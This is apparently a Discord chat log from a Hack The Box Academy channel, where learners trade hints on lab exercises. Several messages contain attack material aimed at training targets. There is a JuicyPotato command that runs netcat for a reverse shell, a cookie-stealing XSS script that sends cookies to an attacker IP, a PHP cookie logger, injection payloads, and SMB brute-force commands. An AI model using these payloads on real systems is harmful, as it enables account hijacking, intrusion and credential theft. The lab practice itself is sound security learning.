hey am doing Buffer overflow on linux x86, Identification of Bad Characters, I have a question on how to generate the next set of CHARS, after i find bad characters. Can someone help me out?

Can I ask a does the foot printing hard machine start blocking scans after a while? Like I can nmap without Pn at start but can’t after I wanna try some different script

The hard one is a pain, the real meat and potatoes of it though is look at the types of servers it's telling you it is. And go from there

That one iirc can be done without even thinking about nmap

The hard one is removing my will to live, I’ll be honest 😄

❗ just want to bring this to the attention of the mods... the timer for the target has a glitch ... It is running faster than normal (i.e. 1 min is less than 60 sec). How did I find out? well I am keeping the timer on my phone as well and it showed 2 min elapsed but HTB shows 10 min instead.

hey

Yes. Thats a well known bug

so does that affect the target lifespan as in I can ignore it?

Ignore it

If the time says 90 min when you reset the box, it'll be up for 90 minutes regardless of how fast the time runs out

Ha I didn’t think bbra backup:ip is an option I can use I just used bbra ip

Skills Assessment - WordPress

The server is so slow, that the reverse shell fails everytime. Does anyone know how to fix or bypass this?

I am using the reverse shell from msfconsole unix/webapp/wp_admin_shell_upload

Yeah the syntax isn't really given to you as braa <community_string>:<IP

Hey everyone, I was wondering if I can get a nudge/DM someone regarding the following:

AD Enumeration & Attacks - Skills Assessment Part II im on the question:

Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

I have an open xp_commandshell and logged into the database.

Remember that not everything has to be an AD specific attack. You have command execution on a windows machine. Your goal should be the same as on any other windows machine

Thank you! I will enumerate different directories using “dir” and see what I can find.

Dont forget to enumerate all the other things you normally would after landing on a non domain joined windows machine

hey which module are you in rn?

I finished AD 2 days ago and then took a break yesterday cuz my brain was fried from doing the 2 assessments back to back. Booting up my VM to start the next module now

i skipped password attacks for now as it was kinda frustrating now Attacking Common Services is buggy and more frustrating

As frustrating as they may be, they are all doable

frustration is very common when working on these things

get used to it

you wont be able to just skip parts of the exam

nah i skipped password attacks to do later

The password attacks labs are really fun

the PtH and PtT sections are important for when you do AD

would not advise skipping that module

Understood. Will do. Thanks!

alr thanks for your suggestion, approx how many days did it need you to complete password attacks and Attacking Common Services

like 3 days for password attacks and a day and a half for common services.

But dont compare yourself to me

Everyone learns at a different pace

for example, I did both AD skills assesments in 8 hours. Most of the people who ive asked all said it took them roughly 8 hours just to finish the second one

Would I need to download tools/exploits to the database? I see the user can be exploited to escalate privileges but I have attempted to download multiple things to it for that past day but have been unsuccessful in doing so.

dm me. Dont wanna spoil anything here

lmk what youve tried so far

Will do thank you!

Hi, started cbbh and going through web requests module, and was wondering the following:
Is there anything that cannot be done without burp suite? using browser dev tools, curl and python scripting, would that in general be enough to replace any need for zap/burp suite, or are there advanced things they do that makes it hard to not use them?

Good evening. Could someone help me with the "Password Attacks Lab - Hard" module?

INstead of asking if you can "ask someone for help" just ask your question

your more likely to get a response

oh well I didn't want to rush through the door

All good, but its always better to just ask your question

well. I was able to crack the *.vhd file and mount it on my Linux system. I got the SAM and System database. I extracted the infos with samdump2 and received the Admin hash. Unfortunately after cracking the hashes with either hashcat or john it shows an empty pw. Also crackstation shows an empty pw. I wasn't able to use neither of them for authentification.

dm me

Don’t ask him he’s a genius

some hints please on assessment 2 of NOSQLI
my SSJI payloads wont succeed, not sure what to try next

I've checked the permutations for both password, and password1. I've applied the custom.rule rule, but with absolutely no favourable outcome. I'm now lost AF. Have u used any other permutation rules, or went with the provided one?

Anyone on here completed the Windows Privilege Escalation Skills Assessment I? I can't get Juicy Potato to work no matter what listening port I use. The command I'm using it start .\JuicyPotato.exe -l 47001 -p c:\windows\system32\cmd.exe -a "/c c:\Users\Public\nc.exe 10.10.16.24 8443 -e cmd.exe" -t *

anyone know why i get a separator unmatched error when using hashcat to crack hccapx files? thank you

hi crean! finally managed to login to smtp after reading the smtp tutorial auth base64 encoding.: EHLO inlanefreight.htb
250-WIN-EASY
250-SIZE 20480000
250-AUTH LOGIN PLAIN
250 HELP
AUTH LOGIN
334 VXNlcm5hbWU6
Username in base64
334 UGFzc3dvcmQ6
Password in base64
235 authenticated.

but then I have to intercept the email that I've sent?

hi folks! module* attacking web applications with ffuf - skills assessment*; the question is: One of the pages you will identify should say 'You don't have access!'. What is the full page URL?
I've tried the recursive scan for each subdomain that I've found previously but no luck in finding anything relevant. Anyone available for a nudge or/and some help? Thank you

👀

im not sure but try the -ms tag in fuff to scan the response text for a given sets of words, just like "You don't have access!"

so lonely in the vc 👀

@rustic sage did u try with evolution

this is a new one!!

is that for smtp stuff?

will try at once 👍

yes lager

if you prefer console you might wanna just try mutt then 🙂

no GUI like setup needed, no account setup needed, pretty much just like another terminal command 😄

thanks for the advices , awesome !!!!

thanks a lot,lager!!!

🙏

wheres your avatar from btw? 😄

tried with bot the -fs and -ms flag, but no luck..

curl -v http://ip/admin?

looks more like an anime 😄

seems that it's a bit old already (no offence) 😄 why this one specifically and not some "mainstream" thing like pokemon? 😄

calling sailor moon a cartoon kills my soul. Also extremely off topic.

bruh sailor moon IS mainstream

Hey everyone, I was wondering if I can get a nudge/DM someone regarding the following:

AD Enumeration & Attacks - Skills Assessment Part II im on the question:

Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

I have an open xp_commandshell and logged into the database. Attempted to transfer nc64.exe to gain a reverse shell and an exploit for privilege escalation but won’t transfer.

won’t transfer.
what does that mean exactly?

what are using to transfer

Certutil.exe and attempted Invoke Web Request. Getting the “200” from the python web server hosting on the attacker machine and “-URLCache command completed successfully but not shown in the system32 directory.

curl http://your.box/nc64.exe -Outfile ./nc64.exe?

try writing to a different folder?

or at least test that you have write access first

I attempted C:/Windows/Temp and still the same.

I will try this

can also just try smb hosting the file

or skip dropping a file altogether for now and use meterpreter smb delivery and use run32dll to remotely load a meterpreter shell.

then use that to do whatever you need to do

Hi, an starting htb from start. One question to ask.
If iam starting a box and how will i prepare for attacking that box?

in the basis of knowledge

you sound like a good candidate for the Intro To Infosec fundementals skill path

do that, and then do all the starting point machines from the main site

is it available in htb or do i have to learn from other source?

and can you explain, what exactly is that?

the skill path is a collection of modules on htb academy

@thorn urchin

I answered

Tried and received the following message: “You can’t access this shared folder because your organization’s security policies block unauthenticated guest access.”
I would like to transfer files into the database without the help of metasploit as I am studying/practicing for OSCP and would like to do thing the manual way. I will probably need to use metasploit though..as no file transfer methods seem to be working..

you have to host the share with authentication

How do you connect to a windows machine from the academy parrot vm - been stuck on active directory for 3 days - lol

wdym by connect

when I look at the help pictures they show using windows - but when I read it seems they use linux

I am confuse lol

Im confused by what youre confused by

why wont the ip adress i got provided load anything in firefox? it just says "cant connect"

Do I use windows or do I use linux

for the active directory stuff

for?

which active directory stuff, which module?

Introduction to Windows Command Line

It probably has an instance to spin up at the bottom and itll tell you how to connect to it

kk ill keep at it some of just one ip and no log ins

but I have not been able to get a windows environment to pop

you may need to take the intro to academy module first

cause ya seem to be missing how the structure of the modules work

That makes sense..attempted to append -username and -password with all credentials found in the answers front the AD Enumeration & Attacks - Skills Assessment Part II (including the provide attacker machine credentials) but receiving a message stating “the username or password is incorrect”.

the authentication is what you set up when youre hosting the smb share

like if youre using impacket-smbserver it defaults to guest creds but you can supply arguments for authentication instead

doesnt need to be a real account

Like this? Not real user or password..

looks about right

idr syntax off the top of my head though

yea that looks about right

you have to connect to the share using net use. net use n: \\<ip>\<sharename

Then you can simply copy files from the n drive. copy n:\filename .

Can you reach that network, e.g. subnet?

if you cannot, how can you copy something

Yes

Never done this before. I will do some research and give it a shot

why is there a macOS fundamentals module if there are no HTB Academy modules or HTB boxes that are about hacking macOS?

hi, quick question: in "getting started" module section "Privilege Escalation" the second Question root priv excalation, the hint mentions "chmod" but I managed to get the root flag by means of ssh. Did I missed something in that lesson? I did ran linpeas but couldn't exploit dirtypipe successfully.

Relevant question.

I personally think it's because macOS is more or less "Linux" (forgive me for using it loosely) with it's access to shell, and one may get to use it sometime during one's journey in career, so I guess it wouldn't hurt to be familiar.

This is just my opinion. There could be plans to introduce a macOS hacking module.

@quasi wave

maybe thats a hint on the status code 405 not permitted, try to find a 405 or similar

got it at the end! thank you

was it the 405?

no, ended up using the -mr flag for regular expressions to match part of the response expected

can give me someone a hint for NOSQLI assessment 2 - SSJI a hint what im doing wrong?
the encoded payload im using is ```" || true || ""=="````

what's SSJI?

server side javascript injection

nosqli and javascript? huh, sounds like a weird combination

afaik nosqli is not directly tied to javascript

its exclusive to nosql with the $where clause

hmm? https://book.hacktricks.xyz/pentesting-web/nosql-injection

here u cn see

ok, well sounds a bit specific. I'm not saying it's impossible

but if you're really going for injecting javacript, you probably don't want to tamper with the actual results of the nosqli query and rather do code exec, hmm?

in this module its ised in the $where clause, it is basicly appending your own js into the query

to get a bypass or fetch data from db by enumerating

well if you have an idea how the query looks like, it should be somehow easy to know what to inject in there ..

i haven't worked with nosqli db for many years so i'm pretty rusty with nosqli, id probaly go with something like { $ne : null } or so

i tried to use all the payloads from the learning chapters, but in the assessment i cant get it working, maybe a filter on server side

haven't done it, so can't tell

this is for assessment 1, the part 2 i sspecific for ssji

i try it for 4 days now, i just want to finish it xD

can't really help on this specifically, if you're having trouble debugging your payloads, just get back to some basic ones and work your way up

frustrating

that's the best way in my experience

So the share got authenticated successfully but having getting “access denied” when trying to copy the file from share. Am I inputting something incorrectly?

just use one command

possibly if you paste some data, but i haven't done anything from academy myself

You sure you have write permission to where youre trying to copy the file to?

payloads or so

Apparently I didn’t and copied to Temp directory and shows it was copied..but “dir c:\Windows\Temp” not showing anything in there..

and what are you injecting to?

└─$ cat script.js
new Image().src='http://YOUR_TUN0_IP/index.php?c='+document.cookie

the website input is vuln to xss

just do copy \\your.box\share\nc c:\windows\temp

change the ip from 0.0.0.0 to your tun0

the other user that loads the script.js needs to know where to call
in that case its your machine

so a valid ip is needed

remove the first payload from script.js
just use the new Image() one

Tried with and without the “nc64.exe” in the Temp directory

it would be much better if you can just copy paste the code and not paste a photo each time 😄 maybe just copy it to c:\, i don't know 😄 try experimenting a bit yourself

at least it shows you that it grabbed the file this time

sudo php -S 0.0.0.0:80
0.0.0.0 means all requesting IPs are passed through

not just a specific, like a whitelist

and use port 80, not https
also make sure you are in the same folder as the files, when running your php sevrer

Been experimenting/trying for the past 3 days and why I have succumbed to asking for help here. 😆. Sorry I will just paste commands and not take pics everytime. I’m just on discord on my phone and not logged in on my Kali machine..lol

copy pasting code is much more accessible for me and possibly easier for you as well i think

It's fine to ask for help, my point is that you might need to "debug" the commands that you get here a little. I haven't done any of the academy stuff i have no clue what exact command is needed

Oh I understand. No worries

The point of experimenting should be that you work your way up by things like confirming that the file is downloaded from your box, written to the target box and so on
hopefully you get that

Understood. Thank you

but do you see a connection from the victim? on you php server

in the console

did you insert the xss into the "website" input field?

anyway, don't feel like you im discouraging you from pasting more stuff in here, i'd be glad to help more or to see further error you need to dead with

└─$ cat index.php

if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

Thank you! 😃

is anyone willing to help with my DNS enumeration issue

sure

paste away 😄

iam working on this question:
What is the FQDN of the host where the last octet ends with "x.x.x.203"?

this is the command i am running:
dnsenum --dnsserver 10.129.42.195 --enum -p -s0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb

i cant remember the exact xss payload i used, i need to check

i understand that subdomains have subdomains. my issue is i have tried all the wordlists in the directory on the subdomains from the intial scan. however, i am making no progress

need more context on that

i'm not familiar with dnsenum

@high sentinel
ns.inlanefreight.htb. 604800 IN A 127.0.0.1
mail1.inlanefreight.htb. 604800 IN A 10.129.18.201
app.inlanefreight.htb. 604800 IN A 10.129.18.15

Subdomains of subdomains

i'd do something like dig @inlanefreight.htb -x x.x.x.203

@fathom pendant is this not the right direction?
dnsenum --dnsserver 10.129.42.195 --enum -p -s0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb

As stated, you can have subdomains of subdomains i.e. a.b.inlanefreight.htb

So that's a start, but not the end

im trying right now, i have no notes on that 😄

If you're still having issues dm me, I am on my meal break at work so may not respond right away

<script src="http://10.10.xx.xx/script.js"></script>

for me its working

thats the payload to put into the website input field

there is no encoding

i did paste is like that

yes "> is %22%3e

so you have your machine ip in script.js, and also in the xss payload

and you dont have other tun open?

@rustic sage and u did it in here?

website input field is the vulnerable field
like is said 3 times now haha

haha

nah

did you do php -S 0.0.0.0:80?

okey it connected

http://10.129.56.1/assessment/index.php/2021/06/11/welcome-to-security-blog/#comment-7
and you are in the /assessment/index.php ?

like the listener on the other side wont "click" it

wow im out of ideas

Borked

anyone there

GladOS?

yes try it

thats the one i tested right now

ima go to bed now

good luck next time

I figured it out finally! 🙌

nice 🙂

hopefully you feel accomplished now 🙂

Yes! I was losing my sh** on this one! 😂

This can be considered spoiler

My apologies. Just edited post.

No problem! It's just one of those exciting things

That’s exactly what it was..stuck on that one for 3 days!! And I do mean full days and late nights sadly..was my days off work. Lol

not sure if this is the right place, sorry if not, i cant write messages in other places.. i'm trying to solve the machines but all the ports keep coming back as filtered when i scan. i tried resetting, reconnecting, and different machines but they all come back as filtered. any help would be appreciated

Please verify yourself via #welcome then go to #boxes

Windows PrivEsc Skills Assessment I. What the hell is going on here? JuicyPotatoNG and I'm still not able to connect because of the COM server port.

Bump... still stuck.

brute forcing is a thing? 😄

isn't it more just about using anonymous session or so?

haven't done it so i don't know for sure. Can possibly help if you're interested

Yeah, it's a thing lol. It's described in the section, using crackmapexec.

And they provide a password list to use; there is also another password list you gain from cracking FTP in the previous exercise. But neither of those lists seem to work for the SMB section.

how come? are you using the lists correctly?

As far as I am aware, yes...

what tools did you try to use?

Tried both medusa and crackmapexec

and both failed?

Both run through the lists until the end and don't return any credentials.

so you've tried using some verbose mode or so, right? (getting something like unsucessful login attempt for user xyz)

Yeah, all of the results come back in the same fashion, e.g., \jason:badger STATUS_LOGON_FAILURE

hmm, are you sure your username is correct?

I mean, it's the one I'm instructed to use

and the syntax of the commands? \jason does not seem like a correct form of the argument, but it might be just the output of local auth of a tool

Yeah, that's just the crackmapexec output, I'm calling it like:

crackmapexec smb A.B.C.D -u jason -p password.list

i'd do crackmapexec smb -u jason -p password.list A.B.C.D

cme is sometimes a bit weird about argument positioning

but if you tried medusa as well, it's probably not the issue

hmm, this is quite strange really

well, maybe .. did you try ||passing the username as password||?

The full output seems to suggest it's doing it correctly:

SMB A.B.C.D 445 ATTCSVC-LINUX [-] \jason:kevin STATUS_LOGON_FAILURE

It actually already exists in the provided list, so that would have been checked.

hmm, possibly a machine name may be needed? looks like it's a linux box running smb which is not that common

like ATTCSVC-LINUX\jason?

Do you mean a Linux box running SMB?

I see that several people have asked but didn’t notice an answer anywhere. Is the footprinting-easy lab, is it possible to find the password without looking at the hint?

ATTCSVC-LINUX -> suggests that the target box is running linux

of course 😄

the hints don't need to be taken 😄

Yeah, I get that, you just said "looks like it's a windows box running smb" lol.

heh, sorry by bad, doing too much stuff at the moment 😄

i meant linux ofc

Haha, all good.

I'll try it, including the domain/hostname and see what happens

any idea is that's a dc? you could try adding --local-auth

Thanks

iirc -d domain, which could possibly (?) help as well

Nothing would suggest it is, given the preceding module contents and what's been taught. So unless HTB is pulling a tricky on me, I doubt it...

can't really tell

Side note: It's odd placing the IP at the end of the command causes cme to terminate immediately with no output, whereas placing it after the smb protocol flag, works

Well thats just syntax. The help menu specifically says the options come after the IP

linux syntax ftw, cme is just weird

Bingo.

try using known password now just with --local-auth

that could possibly work as well

(without the machine name)

I'll give it a shot

Yes, that works; the output is the same as when I was using -d, but it automatically used the machine name. Which is great to know for the future!

Thanks for the nudge(s)

np 👀

you could +rep on htb me if you feel like it 😄

DM me your profile link

i'm using the same name as here 🙂

so, what's the next target? 😄 bruteforcing http? 😄

Bruteforcing notepad.exe 😄

how is that done? teach me 🙂

Not sure, haven't learnt it myself yet!

dam 😄

Lolbins are wild

What’s the fastest way to brute FTP? Hydra? Anything other? Thread count?

I've always had good success with Hydra

Thread count will vary based on the server/network

What’s the highest you can go? I’m just starting to mess with it

FTP is a little bit slow, so I usually start with the default (16) and watch it for a little bit

Be careful with thread count. You can dos

Then adjust up/down based on timeouts, etc.

does anyone need help at the moment? 😄

Not right now unfortunately

person, modules chat is not for flirting